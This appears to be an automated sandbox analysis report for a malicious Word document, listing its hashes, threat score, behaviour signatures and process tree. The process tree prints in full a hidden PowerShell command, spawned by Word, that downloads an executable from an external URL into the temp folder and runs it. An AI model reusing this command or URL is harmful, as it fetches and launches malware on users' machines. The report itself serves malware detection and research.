Analysis

  • max time kernel
    106s
  • max time network
    44s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 04:00

General

  • Target

    7eda9593b5941e3572f7f72fb39e64161e55bbc50a771dc0d17f6312741b2bf7.doc

  • Size

    30KB

  • MD5

    ac75ab65297e0443bc14fa2025273310

  • SHA1

    436719387ae939ae31aba47db8a3ae380d7dd09c

  • SHA256

    7eda9593b5941e3572f7f72fb39e64161e55bbc50a771dc0d17f6312741b2bf7

  • SHA512

    f767dbef9cd943fff0fd0474eafb1bc842833908881650141a7e35eea2d249626eaea6d6f2c76150172cf8b94c484aecf02edef6c04cdf8f3c68ffa03eb32470

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7eda9593b5941e3572f7f72fb39e64161e55bbc50a771dc0d17f6312741b2bf7.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "('https://storage.googleapis.com/auto_connect/Quotation_Request.exe','')|foreach{$fileName=$env:temp+'\'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1944
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1244

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1244-66-0x000007FEFBC91000-0x000007FEFBC93000-memory.dmp
      Filesize

      8KB

    • memory/1244-65-0x0000000000000000-mapping.dmp
    • memory/1944-61-0x0000000000000000-mapping.dmp
    • memory/1944-64-0x0000000004AF0000-0x0000000004C04000-memory.dmp
      Filesize

      1.1MB

    • memory/1944-63-0x000000006A960000-0x000000006AF0B000-memory.dmp
      Filesize

      5.7MB

    • memory/1984-57-0x00000000756E1000-0x00000000756E3000-memory.dmp
      Filesize

      8KB

    • memory/1984-60-0x0000000000425000-0x0000000000429000-memory.dmp
      Filesize

      16KB

    • memory/1984-59-0x0000000000425000-0x0000000000429000-memory.dmp
      Filesize

      16KB

    • memory/1984-58-0x000000007105D000-0x0000000071068000-memory.dmp
      Filesize

      44KB

    • memory/1984-54-0x00000000725F1000-0x00000000725F4000-memory.dmp
      Filesize

      12KB

    • memory/1984-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1984-55-0x0000000070071000-0x0000000070073000-memory.dmp
      Filesize

      8KB

    • memory/1984-67-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB